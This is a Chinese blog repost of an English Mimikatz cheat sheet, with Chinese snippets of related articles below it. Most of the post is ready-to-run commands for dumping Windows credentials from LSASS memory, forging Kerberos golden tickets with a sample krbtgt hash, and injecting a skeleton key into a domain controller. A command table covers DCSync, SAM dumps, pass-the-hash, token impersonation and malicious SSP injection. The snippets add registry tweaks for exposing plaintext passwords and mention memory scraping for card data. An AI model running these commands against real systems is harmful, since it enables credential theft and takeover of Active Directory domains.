windows Mimikatz使用方法

最新推荐文章于 2024-05-12 13:02:42 发布
最新推荐文章于 2024-05-12 13:02:42 发布
阅读量702 收藏 1
点赞数
文章标签: 大数据 数据库
原文链接:http://www.cnblogs.com/heycomputer/articles/10411464.html
版权

Windows - Mimikatz

Data in memory

 

Mimikatz - Execute commands

Only one command

PS C:\temp\mimikatz> .\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit

Mimikatz console (multiple commands)

PS C:\temp\mimikatz> .\mimikatz
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords mimikatz # sekurlsa::wdigest

 

Mimikatz - Extract passwords

mimikatz_command -f sekurlsa::logonPasswords full
mimikatz_command -f sekurlsa::wdigest

 

Mimikatz Golden ticket

.\mimikatz kerberos::golden /admin:ADMINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt
.\mimikatz "kerberos::golden /admin:DarthVader /domain:rd.lab.adsecurity.org /id:9999 /sid:S-1-5-21-135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /startoffset:0 /endin:600 /renewmax:10080 /ptt" exit

 

Mimikatz Skeleton key

privilege::debug
misc::skeleton
# map the share
net use p: \\WIN-PTELU2U07KG\admin$ /user:john mimikatz
# login as someone rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab

 

Mimikatz commands

CommandDefinition
CRYPTO::Certificateslist/export certificates
CRYPTO::Certificateslist/export certificates
KERBEROS::Goldencreate golden/silver/trust tickets
KERBEROS::Listlist all user tickets (TGT and TGS) in user memory. No special privileges required since it only displays the current user’s tickets.Similar to functionality of “klist”.
KERBEROS::PTTpass the ticket. Typically used to inject a stolen or forged Kerberos ticket (golden/silver/trust).
LSADUMP::DCSyncask a DC to synchronize an object (get password data for account). No need to run code on DC.
LSADUMP::LSAAsk LSA Server to retrieve SAM/AD enterprise (normal, patch on the fly or inject). Use to dump all Active Directory domain credentials from a Domain Controller or lsass.dmp dump file. Also used to get specific account credential such as krbtgt with the parameter /name: “/name:krbtgt”
LSADUMP::SAMget the SysKey to decrypt SAM entries (from registry or hive). The SAM option connects to the local Security Account Manager (SAM) database and dumps credentials for local accounts. This is used to dump all local credentials on a Windows computer.
LSADUMP::TrustAsk LSA Server to retrieve Trust Auth Information (normal or patch on the fly). Dumps trust keys (passwords) for all associated trusts (domain/forest).
MISC::AddSidAdd to SIDHistory to user account. The first value is the target account and the second value is the account/group name(s) (or SID). Moved to SID:modify as of May 6th, 2016.
MISC::MemSSPInject a malicious Windows SSP to log locally authenticated credentials.
MISC::SkeletonInject Skeleton Key into LSASS process on Domain Controller. This enables all user authentication to the Skeleton Key patched DC to use a “master password” (aka Skeleton Keys) as well as their usual password.
PRIVILEGE::Debugget debug rights (this or Local System rights is required for many Mimikatz commands).
SEKURLSA::Ekeyslist Kerberos encryption keys
SEKURLSA::KerberosList Kerberos credentials for all authenticated users (including services and computer account)
SEKURLSA::Krbtgtget Domain Kerberos service account (KRBTGT)password data
SEKURLSA::LogonPasswordslists all available provider credentials. This usually shows recently logged on user and computer credentials.
SEKURLSA::PthPass- theHash and Over-Pass-the-Hash
SEKURLSA::TicketsLists all available Kerberos tickets for all recently authenticated users, including services running under the context of a user account and the local computer’s AD computer account. Unlike kerberos::list, sekurlsa uses memory reading and is not subject to key export restrictions. sekurlsa can access tickets of others sessions (users).
TOKEN::Listlist all tokens of the system
TOKEN::Elevateimpersonate a token. Used to elevate permissions to SYSTEM (default) or find a domain admin token on the box
TOKEN::Elevate /domainadminimpersonate a token with Domain Admin credentials.

 

Powershell Mimikatz

Mimikatz in memory (no binary on disk) with :

More informations can be grabbed from the Memory with :

 

References

转载于:https://www.cnblogs.com/heycomputer/articles/10411464.html

weixin_30657999
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
技术分享 | mimikatz的常见使用方法
Uguardsec的博客
08-10 3168
0x00简介 Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文密码!也就
mimikatz使用方法
课嗨教育的专栏
04-23 3780
0x00 简介 Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe进程中获取当前登录系统用户名的密码, lsass 是微软 Windows 系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass 内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对 lsass 逆算获取.
内网中的主机密码抓取
Amire0x的小乐园
11-29 2544
密码抓取 Mimikatz mimikatz的几大运行方式 使用前先将对应版本的mimikazi传上去 运行如下 命令不支持粘贴,不区分大小写 基本使用 基于win2003测试 列出导出凭证 crypto::certificates 获得debug权限(需要debug权限来执行一些mimikatz命令) privilege::debug 提升成功则会返回 OK 获取所有可用的提供者凭据,可得到当前账户的密码 sekurlsa::logonpasswords 查看token tok
内网渗透神器(Mimikatz)——使用教程
热门推荐
W小哥
04-16 6万+
一、工具简介 Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具。 二、Mimikatz命令 cls: 清屏 standard: 标准模块,基本命令 crypto: 加密相关模块 sekurlsa: 与证书相关的模块 kerberos: kerberos模块 privilege: 提权相关模块 process: 进程相关
2024年网络安全最全内网渗透神器(Mimikatz)——使用教程,2024年最新当上项目经理才知道
最新发布
2401_84267585的博客
05-12 2036
Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具。当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。
萌新如何玩转mimikatz
m0_71745484的博客
02-13 5899
mimikatz就是我遇见的一个坎
mimikatz工具的介绍和基本使用
菜鸟-宇的个人博客
10-02 1354
该模块是用于提权的模块。mimikatz 很多模块需要高权限运行,因此执行高权限操作模块的时候需要先利用 privilege 模块进行提权。如下命令是用于提权的命令,只能用具有管理员权限的窗口执行该命令才能成功,普通用户权限执行该提权命令会失败。
mimikatz.zip附简单使用方法
08-01
mimikatz使用需要administrator用户执行,administrators中的其他用户都不行。 注意该程序会被ban 提升权限 privilege::debug 抓取密码 sekurlsa::logonpasswords reg add HKLM\SYSTEM\CurrentControlSet\Control...
mimikatz 抓取 Windows 明文密码
06-02
Mimikatz - Windows 密码抓取神器 轻量级调试器神器 - mimikatz - 直接抓取 Windows 明文密码! 这个神器的功能肯定不仅仅如此 在我看来它更像一个轻量级调试器 可以提升进程权限 注入进程 读取
Mimikatz Windows 密码抓取神器
05-27
**Mimikatz** 是一款由法国安全研究员 Benjamin Delpy 开发的开源工具,主要用于网络安全领域,尤其是针对Windows操作系统的内网安全检测。这款工具因其强大的密码抓取能力而闻名,可以提取出系统内存中的明文密码、...
一键获取windows密码神器mimikatz咪咪猫
07-23
4. **防御Mimikatz**:为了防止Mimikatz被滥用,企业可以采取多种措施,如加强访问控制、启用审核策略、更新操作系统补丁、使用更安全的身份验证方法等。 5. **法律和伦理**:使用Mimikatz进行密码抓取必须遵循法律...
mimikatz-trunk(2.2.0 20190512 Windows 10 1903).zip
01-06
总之,mimikatz-trunk是Windows安全研究领域不可或缺的工具,它揭示了操作系统内部的安全漏洞和潜在风险,同时为系统管理员提供了检查和修复这些漏洞的方法。然而,由于其强大的功能,也常常被恶意黑客利用,因此在...
mimikittenz:开发后的powershell工具,用于从内存中提取多汁信息
02-24
mimikittenz mimikittenz是开发后的mimikittenz工具,它利用Windows函数ReadProcessMemory()来从各种目标进程中提取纯文本密码。 mimikittenz还可以使用正则表达式模式轻松地从目标进程中提取其他类型的多汁信息,包括但不限于: 来自商家/ POS流程的TRACK2(信用卡)数据 PII数据 加密密钥和所有其他商品 注意:该工具的目标是运行中的进程内存地址空间,一旦进程被杀死,它的内存“应该”被清理并且不可访问,但是在某些情况下,这种情况不会发生。 屏幕截图 描述 mimikittenz的目的是提供用户级别(非管理员特权)的敏感数据提取,以最大程度地利用开发后的工作并增加每个目标收集的信息的价值。 当前mimikittenz能够从内存中提取以下凭据: ##### Webmail ##### 邮箱 Office365 Ou
Mimikatz介绍
#7的博客
03-26 1553
本文主要介绍了mimikatz的定义、功能模块,并对常见的功能模块进行了详细的阐述。
内网渗透系列-mimikatz使用以及后门植入
lza20001103的博客
04-15 1214
内网渗透系列-mimikatz使用以及后门植入
windows账户安全(通过mimikatz、Jhon获取用户密码)
qq_62729556的博客
07-23 2172
使用命令“john-format=NT hash.txt”使用Jhon自带的字典碰撞hash值进行破解。第一步:使用管理员权限,切换到c盘路径,执行命令“reg save hklm\sam sam.hive”和“reg save hklm\system system.hive”将注册表中SAM、System文件导出到本地磁盘。命令“ samdump2 system.hive sam.hive > hash.txt ” 使用sam dump 2工具将sam数据库文件破解成可识别的NTLM hash。
内网渗透神器(Mimikatz)——使用教程,你会的还只有初级工程师的技术吗
2401_84446919的博客
04-18 1201
在域控上执行)查看域kevin.com内指定用户root的详细信息,包括NTLM哈希等。从sam.hive和system.hive文件中获得NTLM Hash。sr98: 用于SR98设备和T5577目标的RF模块。rdm: RDM(830AL)器件的射频模块。rpc: mimikatz的RPC控制。导出lsass.exe进程中所有的票据。(在域控上执行)读取所有域用户的哈希。acr: ACR模块。开启Wdigest Auth。关闭Wdigest Auth。
在Win10系统中用mimikatz抓取明文密码
weixin_42558965的博客
03-22 4162
实验环境 :Windows10专业版 参考了网上的方法,发现大部分都是抄的 https://blog.csdn.net/netsec_steven/article/details/107257325 这一篇文章,都被转烂了,这一篇文章是对的,但是路径上还是有点小问题的,原因是原作者跳了一个步骤 这个步骤是:在注册表HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest下新建一个名为UseLogonCredential的DWORD值,并且
mimikatz使用详解
qq_59468567的博客
04-12 478
该模块是用于提权的模块,很多模块需要高权限运行,所以要先进行提权,只能用具有管理员权限的命令行窗口才可以执行成功,普通用户使用提权命令会失败。其中常用的是privilege、sekurlsa、kerberos、lsadump、token、sid模块。改模块是对Local Security Authiruty(LSA)进行密码抓取的模块。使用该模块需要高权限,因此需要执行提权命令,如下是常用命令。该模块是与Kerberos相关的模块。• privilege 提权模块。• kerberos包模块。
kali 中mimikatz使用教程
06-28
这是一个对于使用 Mimikatz 工具的教程。 Mimikatz 是一个开发者用来获取 Windows 认证凭证的工具,它可以解密 Windows 存储的密码,甚至可以获取经过 NTLM 身份验证的密码。 但请注意,使用这个工具可能会涉及到...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值